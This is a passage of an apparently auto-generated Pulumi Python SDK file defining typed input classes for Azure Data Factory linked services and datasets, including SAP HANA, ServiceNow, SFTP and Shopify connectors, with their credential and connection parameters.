parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
SAP HANA Linked Service.
:param Any server: Host name of the SAP HANA server. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] authentication_type: The authentication type to be used to connect to the SAP HANA server.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to access the SAP HANA server.
:param Any user_name: Username to access the SAP HANA server. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'SapHana')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def server(self) -> Any:
"""
Host name of the SAP HANA server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
The authentication type to be used to connect to the SAP HANA server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to access the SAP HANA server.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
Username to access the SAP HANA server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class SecureStringArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
value: pulumi.Input[str]):
"""
Azure Data Factory secure string definition. The string value will be masked with asterisks '*' during Get or List API calls.
:param pulumi.Input[str] type: Type of the secret.
:param pulumi.Input[str] value: Value of secure string.
"""
pulumi.set(__self__, "type", 'SecureString')
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of the secret.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
Value of secure string.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class SelfHostedIntegrationRuntimeArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
linked_info: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyArgs', 'LinkedIntegrationRuntimeRbacArgs']]] = None):
"""
Self-hosted integration runtime.
:param pulumi.Input[str] type: Type of integration runtime.
:param pulumi.Input[str] description: Integration runtime description.
:param pulumi.Input[Union['LinkedIntegrationRuntimeKeyArgs', 'LinkedIntegrationRuntimeRbacArgs']] linked_info: The base definition of a secret type.
"""
pulumi.set(__self__, "type", 'SelfHosted')
if description is not None:
pulumi.set(__self__, "description", description)
if linked_info is not None:
pulumi.set(__self__, "linked_info", linked_info)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of integration runtime.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Integration runtime description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="linkedInfo")
def linked_info(self) -> Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyArgs', 'LinkedIntegrationRuntimeRbacArgs']]]:
"""
The base definition of a secret type.
"""
return pulumi.get(self, "linked_info")
@linked_info.setter
def linked_info(self, value: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyArgs', 'LinkedIntegrationRuntimeRbacArgs']]]):
pulumi.set(self, "linked_info", value)
@pulumi.input_type
class ServiceNowLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
endpoint: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_id: Optional[Any] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None,
username: Optional[Any] = None):
"""
ServiceNow server linked service.
:param pulumi.Input[str] authentication_type: The authentication type to use.
:param Any endpoint: The endpoint of the ServiceNow server. (i.e. <instance>.service-now.com)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param Any client_id: The client id for OAuth2 authentication.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret for OAuth2 authentication.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name for Basic and OAuth2 authentication.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
:param Any username: The user name used to connect to the ServiceNow server for Basic and OAuth2 authentication.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'ServiceNow')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_id is not None:
pulumi.set(__self__, "client_id", client_id)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication type to use.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the ServiceNow server. (i.e. <instance>.service-now.com)
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Optional[Any]:
"""
The client id for OAuth2 authentication.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Optional[Any]):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret for OAuth2 authentication.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name for Basic and OAuth2 authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name used to connect to the ServiceNow server for Basic and OAuth2 authentication.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class ServiceNowObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
ServiceNow server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ServiceNowObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SftpServerLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
host_key_fingerprint: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
pass_phrase: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
private_key_content: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
private_key_path: Optional[Any] = None,
skip_host_key_validation: Optional[Any] = None,
user_name: Optional[Any] = None):
"""
A linked service for an SSH File Transfer Protocol (SFTP) server.
:param Any host: The SFTP server host name. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] authentication_type: The authentication type to be used to connect to the FTP server.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any host_key_fingerprint: The host key finger-print of the SFTP server. When SkipHostKeyValidation is false, HostKeyFingerprint should be specified. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] pass_phrase: The password to decrypt the SSH private key if the SSH private key is encrypted.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to logon the SFTP server for Basic authentication.
:param Any port: The TCP port number that the SFTP server uses to listen for client connections. Default value is 22. Type: integer (or Expression with resultType integer), minimum: 0.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] private_key_content: Base64 encoded SSH private key content for SshPublicKey authentication. For on-premises copy with SshPublicKey authentication, either PrivateKeyPath or PrivateKeyContent should be specified. SSH private key should be OpenSSH format.
:param Any private_key_path: The SSH private key file path for SshPublicKey authentication. Only valid for on-premises copy. For on-premises copy with SshPublicKey authentication, either PrivateKeyPath or PrivateKeyContent should be specified. SSH private key should be OpenSSH format. Type: string (or Expression with resultType string).
:param Any skip_host_key_validation: If true, skip the SSH host key validation. Default value is false. Type: boolean (or Expression with resultType boolean).
:param Any user_name: The username used to log on to the SFTP server. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Sftp')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if host_key_fingerprint is not None:
pulumi.set(__self__, "host_key_fingerprint", host_key_fingerprint)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if pass_phrase is not None:
pulumi.set(__self__, "pass_phrase", pass_phrase)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if private_key_content is not None:
pulumi.set(__self__, "private_key_content", private_key_content)
if private_key_path is not None:
pulumi.set(__self__, "private_key_path", private_key_path)
if skip_host_key_validation is not None:
pulumi.set(__self__, "skip_host_key_validation", skip_host_key_validation)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def host(self) -> Any:
"""
The SFTP server host name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
The authentication type to be used to connect to the FTP server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="hostKeyFingerprint")
def host_key_fingerprint(self) -> Optional[Any]:
"""
The host key finger-print of the SFTP server. When SkipHostKeyValidation is false, HostKeyFingerprint should be specified. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host_key_fingerprint")
@host_key_fingerprint.setter
def host_key_fingerprint(self, value: Optional[Any]):
pulumi.set(self, "host_key_fingerprint", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="passPhrase")
def pass_phrase(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password to decrypt the SSH private key if the SSH private key is encrypted.
"""
return pulumi.get(self, "pass_phrase")
@pass_phrase.setter
def pass_phrase(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "pass_phrase", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to logon the SFTP server for Basic authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port number that the SFTP server uses to listen for client connections. Default value is 22. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="privateKeyContent")
def private_key_content(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Base64 encoded SSH private key content for SshPublicKey authentication. For on-premises copy with SshPublicKey authentication, either PrivateKeyPath or PrivateKeyContent should be specified. SSH private key should be OpenSSH format.
"""
return pulumi.get(self, "private_key_content")
@private_key_content.setter
def private_key_content(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "private_key_content", value)
@property
@pulumi.getter(name="privateKeyPath")
def private_key_path(self) -> Optional[Any]:
"""
The SSH private key file path for SshPublicKey authentication. Only valid for on-premises copy. For on-premises copy with SshPublicKey authentication, either PrivateKeyPath or PrivateKeyContent should be specified. SSH private key should be OpenSSH format. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "private_key_path")
@private_key_path.setter
def private_key_path(self, value: Optional[Any]):
pulumi.set(self, "private_key_path", value)
@property
@pulumi.getter(name="skipHostKeyValidation")
def skip_host_key_validation(self) -> Optional[Any]:
"""
If true, skip the SSH host key validation. Default value is false. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "skip_host_key_validation")
@skip_host_key_validation.setter
def skip_host_key_validation(self, value: Optional[Any]):
pulumi.set(self, "skip_host_key_validation", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
The username used to log on to the SFTP server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class ShopifyLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
access_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Shopify Service linked service.
:param Any host: The endpoint of the Shopify server. (i.e. mystore.myshopify.com)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: The API access token that can be used to access Shopify’s data. The token won't expire if it is offline mode.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Shopify')
if access_token is not None:
pulumi.set(__self__, "access_token", access_token)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def host(self) -> Any:
"""
The endpoint of the Shopify server. (i.e. mystore.myshopify.com)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The API access token that can be used to access Shopify’s data. The token won't expire if it is offline mode.
"""
return pulumi.get(self, "access_token")
